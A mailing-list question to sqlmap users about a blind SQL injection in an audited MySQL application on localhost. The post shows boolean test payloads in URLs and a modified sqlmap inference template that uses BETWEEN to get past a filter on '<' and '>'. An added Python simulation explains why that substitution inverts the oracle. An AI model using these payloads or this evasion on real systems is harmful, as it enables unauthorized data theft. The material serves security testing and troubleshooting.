[sqlmap-users] blind sql injection problem
From: velky b. <vel...@gm...> - 2010-02-20 17:38:26
Hello,
I have found a blind SQL injection in the GET parameter of an audited MySQL
application (sqlmap is also able to identify the injection), but it is not
possible to dump any data (like --current-user or --current-db). The only
option which is working is --fingerprint (it gives the correct result of MySQL 5
version); all other options gave the same result, "None".
Because it looked strange to me, I made some basic tests manually, with the
following results:
http://localhost/index.php?id=9 AND 1 = 1 ---> TRUE (should be TRUE)
http://localhost/index.php?id=9 AND 1 = 0 ---> FALSE (should be FALSE)
http://localhost/index.php?id=9 AND 6 > 5 ---> FALSE (should be TRUE)
http://localhost/index.php?id=9 AND 6 < 5 ---> FALSE (should be FALSE)
http://localhost/index.php?id=9 AND 6 BETWEEN 0 and 5 ---> FALSE
http://localhost/index.php?id=9 AND 6 BETWEEN 0 and 10 ---> TRUE
As you can see from these results, it looks like the characters "<" and ">" are
filtered within the application.
However, the injection is still working. I suppose that sqlmap uses these
characters ("<", ">") really often when dumping data from the database.
So I have changed the following line in the mysql section of the queries.xml file:
original line:
<inference query="AND ORD(MID((%s), %d, 1)) > %d"/>
updated line:
<inference query="AND ORD(MID((%s), %d, 1)) BETWEEN 0 AND %d"/>
Unfortunately, the result was the same (None). What else should be modified?
Is it possible to use a BETWEEN statement instead of ">" in the current version
of sqlmap?
Is it already supported somehow in sqlmap, or would it appear in future
versions?
Thank you in advance
vb
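To see why the substituted queries.xml line yields wrong results, here is an added example (not from the original post and not sqlmap's own code) that simulates the boolean-based bisection that an inference query of this shape implies, against an in-memory secret instead of a real application. `BETWEEN 0 AND %d` is the complement of `> %d`, so every oracle answer is inverted and the search converges on the wrong character; the secret string, the `%d` pivot range 0..255 and the helper names are all constructed for the example.

```python
from typing import Callable

# Constructed secret standing in for a value such as the --current-user result.
SECRET = "root@localhost"

Predicate = Callable[[int, int], bool]

def gt_predicate(value: int, pivot: int) -> bool:
    """Truth of the original template: ORD(char) > %d."""
    return value > pivot

def between_predicate(value: int, pivot: int) -> bool:
    """Truth of the substituted template: ORD(char) BETWEEN 0 AND %d."""
    return 0 <= value <= pivot

def make_oracle(secret: str, predicate: Predicate):
    """Simulated application page: answers TRUE/FALSE for one injected
    predicate about character `pos` (1-based, like MID) against the pivot."""
    def oracle(pos: int, pivot: int) -> bool:
        return predicate(ord(secret[pos - 1]), pivot)
    return oracle

def bisect_char(oracle, pos: int, lo: int = 0, hi: int = 255) -> int:
    """Bisection search for one character's ordinal. The loop is written for a
    '> pivot' oracle: TRUE means the value is above the pivot, so the lower
    bound moves up; FALSE moves the upper bound down."""
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if oracle(pos, mid):
            lo = mid
        else:
            hi = mid
    return hi  # invariant: value > lo and value <= hi, so value == hi

def infer(length: int, oracle) -> str:
    """Recover `length` characters one at a time."""
    return "".join(chr(bisect_char(oracle, p)) for p in range(1, length + 1))

def same_truth_table(a: Predicate, b: Predicate) -> bool:
    """Two templates are interchangeable only if they agree on every
    (value, pivot) pair the search can ask about."""
    return all(a(v, p) == b(v, p) for v in range(256) for p in range(256))

if __name__ == "__main__":
    gt = make_oracle(SECRET, gt_predicate)
    bt = make_oracle(SECRET, between_predicate)
    print("with '> %d':            ", infer(len(SECRET), gt))
    print("with 'BETWEEN 0 AND %d':", repr(infer(len(SECRET), bt)))
    print("same truth table?", same_truth_table(gt_predicate, between_predicate))
```

The filter on "<" and ">" does not change the information leak itself: the page still answers one true/false question per request, which is why the fix on the application side is a parameterized query rather than character filtering.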